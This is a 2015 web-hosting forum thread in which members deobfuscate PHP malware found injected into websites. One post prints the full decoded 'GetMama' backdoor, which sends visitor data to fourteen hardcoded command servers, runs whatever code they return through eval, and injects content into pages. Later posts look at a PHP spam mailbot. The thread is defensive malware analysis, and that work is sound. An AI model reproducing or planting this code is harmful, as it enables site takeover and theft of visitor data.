Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!


php code injection: $xetqlznzyr =
New on LowEndTalk? Please Register and read our Community Rules.

All new Registrations are manually reviewed and approved, so a short delay after registration may occur before your account becomes active.

php code injection: $xetqlznzyr =

IrisIris Member
edited May 2015 in Help

<?php $xetqlznzyr = '5-#1GO%x5c%x7822#)fepmqyfA>2b%x5c%x7825
Recently some of websites get php code injection. What is above codes? it's not like base64

It's quet long one http://pastebin.com/tdWHaCGX

thanks to EdgeWeb of mentioning pastebin

Comments

  • Obviously that's not all it, inside the rest of the code there's the routine that decrypts and executes it.

    You can decrypt it manually by reversing the steps it does, if you care to.

    Thanked by 1jar
  • EdgeWebEdgeWeb Member

    You'll have to upload a larger sample for anyone to be able to decipher anything from it. I also recommend that you upload it and link it via pastebin.

    Thanked by 1Iris
  • Upload the whole code man.

  • IrisIris Member

    it's quiet long one http://pastebin.com/tdWHaCGX

  • ricardoricardo Member

    often it's just a gateway to accept requests/commands from a remote computer, as it gives them flexibility on how to use your resources. there's no great incentive to encrypt that other than curiosity.

    Thanked by 1deadbeef
  • It's not long, seen similar. Give me a few min to deobfuscate for you.

  • Too lazy to finish the rest but quite simply:

    if((function_exists("ob_start") && (!isset($GLOBALS["anuna"])))) { $GLOBALS["anuna"]=1; function fjfgg($n){return chr(ord($n)-1);} @error_reporting(0); preg_replace("/(.*)/e","eval(implode(array_map("fjfgg",str_split("\x25u:f!>!(\x25\x78:!>#]y3g]61]y3f]63]y3:]68]y76#<\xe\xb\\

    Thanked by 1Iris
  • And last message in this thread, the script I used to recover the original code: http://pastebin.com/Z30nMjWE

  • lol @ all the "decryptions" :D

  • ricardoricardo Member

    if($owned) echo "All your base!";

  • DevoniusDevonius Member
    edited May 2015

    just curious, how did you decrypt it?

  • MicrolinuxMicrolinux Member
    edited May 2015

    I added line endings, searched/replaced and cleaned up the formatting.

  • This is what I've got, decoded and formatted :D
    http://pastebin.com/5dJSSqnJ

  • FalzoFalzo Member

    this part seems esp. of interest:

       $father2[] = "77.81.241.253";
       $father2[] = "46.249.58.135";
       $father2[] = "176.9.241.150";
       $father2[] = "46.37.169.56";
       $father2[] = "94.242.255.35";
       $father2[] = "178.162.129.223";
       $father2[] = "31.184.234.96";
       $father2[] = "77.95.18.189";
       $father2[] = "93.170.137.22";
       $father2[] = "188.40.95.244";
       $father2[] = "199.115.231.58";
       $father2[] = "82.192.87.178";
       $father2[] = "216.246.99.215";
       $father2[] = "95.211.18.79";
    

    probably one wants to blacklist all of those ;-)

  • edited May 2015

    GetMama

    https://blog.sucuri.net/2012/04/getmama-conditional-malware-affecting-thousands-of-sites.html

    For every request to the compromised sites, there will also be a random call to one of those. The called URL would look something like http://31.184.234.96/jedi.php?version=0991&mother=

    Thanked by 1daxterfellowes
  • TrafficTraffic Member
    edited May 2015

    Decoded it too late, @jemekite posted it before I saw it, but here's the code anyway:

    if (!function_exists("GetMama")) {
        function ahfudflfzdhfhs($pa)
        {
            $mama = GetMama();
            $file = urlencode(__FILE__);
            if (isset($_SERVER["HTTP_HOST"])) {
                $host = $_SERVER["HTTP_HOST"];
            }
            else {
                $host = "";
            }
    
            if (isset($_SERVER["REMOTE_ADDR"])) {
                $ip = $_SERVER["REMOTE_ADDR"];
            }
            else {
                $ip = "";
            }
    
            if (isset($_SERVER["HTTP_REFERER"])) {
                $ref = urlencode($_SERVER["HTTP_REFERER"]);
            }
            else {
                $ref = "";
            }
    
            if (isset($_SERVER["HTTP_USER_AGENT"])) {
                $ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));
            }
            else {
                $ua = "";
            }
    
            if (isset($_SERVER["QUERY_STRING"])) {
                $qs = urlencode($_SERVER["QUERY_STRING"]);
            }
            else {
                $qs = "";
            }
    
            $url_0 = "http://" . $pa;
            $url_1 = "/jedi.php?version=0994&mother=" . $mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" . $ua . "&qs=" . $qs;
            $try = true;
            if (function_exists("curl_init")) {
                $ch = curl_init($url_0 . $url_1);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                curl_setopt($ch, CURLOPT_TIMEOUT, 3);
                $ult = trim(curl_exec($ch));
                $try = false;
            }
    
            if ((ini_get("allow_url_fopen")) && $try) {
                $ult = trim(@file_get_contents($url_0 . $url_1));
                $try = false;
            }
    
            if ($try) {
                $fp = fsockopen($pa, 80, $errno, $errstr, 30);
                if ($fp) {
                    $out = "GET $url_1 HTTP/1.0\r\n";
                    $out.= "Host: $pa\r\n";
                    $out.= "Connection: Close\r\n\r\n";
                    fwrite($fp, $out);
                    $ret = "";
                    while (!feof($fp)) {
                        $ret.= fgets($fp, 128);
                    }
    
                    fclose($fp);
                    $ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
                }
            }
    
            if (strpos($ult, "eval") !== false) {
                $z = stripslashes(str_replace("eval", "", $ult));
                eval($z);
                exit();
            }
    
            if (strpos($ult, "ebna") !== false) {
                $_SERVER["good"] = str_replace("ebna", "", $ult);
                return true;
            }
            else {
                return false;
            }
        }
    
        function gogo()
        {
            $father2[] = "77.81.241.253";
            $father2[] = "46.249.58.135";
            $father2[] = "176.9.241.150";
            $father2[] = "46.37.169.56";
            $father2[] = "94.242.255.35";
            $father2[] = "178.162.129.223";
            $father2[] = "31.184.234.96";
            $father2[] = "77.95.18.189";
            $father2[] = "93.170.137.22";
            $father2[] = "188.40.95.244";
            $father2[] = "199.115.231.58";
            $father2[] = "82.192.87.178";
            $father2[] = "216.246.99.215";
            $father2[] = "95.211.18.79";
            shuffle($father2);
            foreach($father2 as $ur) {
                if (ahfudflfzdhfhs($ur)) {
                    return true;
                }
            }
        }
    
        function mod_con($buf)
        {
            str_ireplace("", "", $buf, $cnt_h);
            if ($cnt_h == 1) {
                gogo();
                $buf = str_ireplace("", "" . stripslashes($_SERVER["good"]) , $buf);
                return $buf;
            }
    
            str_ireplace("", "", $buf, $cnt_h);
            if ($cnt_h == 1) {
                gogo();
                $buf = str_ireplace("", stripslashes($_SERVER["good"]) . "", $buf);
                return $buf;
            }
    
            return $buf;
        }
    
        function opanki($buf)
        {
            $gz_e = false;
            $h_l = headers_list();
            if (in_array("Content-Encoding: gzip", $h_l)) {
                $gz_e = true;
            }
    
            if ($gz_e) {
                $tmpfname = tempnam("/tmp", "FOO");
                file_put_contents($tmpfname, $buf);
                $zd = gzopen($tmpfname, "r");
                $contents = gzread($zd, 10000000);
                $contents = mod_con($contents);
                gzclose($zd);
                unlink($tmpfname);
                $contents = gzencode($contents);
            }
            else {
                $contents = mod_con($buf);
            }
    
            $len = strlen($contents);
            header("Content-Length: " . $len);
            return ($contents);
        }
    
        function GetMama()
        {
            $mother = "halsun.net";
            return $mother;
        }
    
        ob_start("opanki");
    }
    

    Only 2 of the father servers look online though.

  • What's about if declare 'function GetMama() { return; }' before/upper their code?.

  • @Falzo said:
    this part seems esp. of interest:

    probably one wants to blacklist all of those ;-)

    I got a better idea, write a python script to mass-inject garbage data since it's inserting it into a database. Might as well fill them with nonsense.

    Thanked by 1netomx
  • And that's why I need to stop taking coffee breaks, haven't tested the code, because I'm about to finish my break but...

    pastebin.com/n3zPpRgn

  • TrafficTraffic Member

    @KwiceroLTD Do you really think you can pollute their database with that? I can delete all your "garbage" with a single SELECT.

    Don't leave your day job ;)

  • KwiceroLTDKwiceroLTD Member
    edited May 2015

    @Traffic said:
    KwiceroLTD Do you really think you can pollute their database with that? I can delete all your "garbage" with a single SELECT.

    Don't leave your day job ;)

    Yep you could, but if I had more time I'd add randomization of data so it's unique each request, etc. Top it all off, I'd add socks proxy support, and route it via tor to make it more of a pain in the ass.

    Thanked by 1Traffic
  • Can anyone have a go at decrypting this?

    Popped up on a client's machine twice now:

    https://gist.githubusercontent.com/anonymous/d5d445681671f61fa9ee/raw

  • edited May 2015

    @GStanley said:
    Can anyone have a go at decrypting this?

    Popped up on a client's machine twice now:

    https://gist.githubusercontent.com/anonymous/d5d445681671f61fa9ee/raw

    Haven't done the whole thing, but it's sending out mail...

    [qjyxw29] => error_reporting [irxaj0] => ini_set [cbimi76] => define [fdxkd35] => itwro48 [zkmxz95] => ikhls17 [qlafq33] => md5 [besfv99] => count [akdzl43] => time [nmgeu13] => constant [ylhli22] => xbzaw60 [tubyj82] => jcrxt31 [wlean57] => gtzjf94 [nfnov60] => onsxx86 [kowuc61] => nydwd49 [oenkz14] => function_exists [dptpo51] => mail <------------ [wbusj95] => hfrbo91 [cqced42] => rmssi53 [hcmkz82] => usleep [wqgpi24] => vgefz59 [lecyc16] => wowhk28 [vbzwj52] => trim [royge30] => preg_replace [genac32] => gethostbyname [aibit15] => preg_match

    ....

    [ztope57] => base64_encode [mlygh38] => socket_create [tpzik24] => socket_last_error [bxcji64] => socket_strerror [ynqyo69] => socket_set_option [fofco25] => socket_set_nonblock [hpaqw69] => socket_connect [lsftb14] => fsockopen

    Thanked by 1GStanley
  • Thanks! It's been spamming out quite a bit, and wanted to figure out something to throw in disable_functions, or get a look at the code.

    Been clearing out the directory a while now of injected PHP that got it there.

  • jazz1611jazz1611 Member
    edited May 2015

    New code php spam email bot, i found many this file on source Wordpress - http://pastebin.com/Kkr633Jq

  • @jazz1611 said:
    New code php spam email bot, i found many this file on source Wordpress - http://pastebin.com/Kkr633Jq

    This is as far as I got: http://pastebin.com/1CjSMvbz. You should probably secure your server.

  • For WordPress, Wordfence Security is what I like for e.g. checking the integrity of files.

  • new code "Php.Malware.Mailbot-1" http://pastebin.com/mSrUTe8K

Sign In or Register to comment.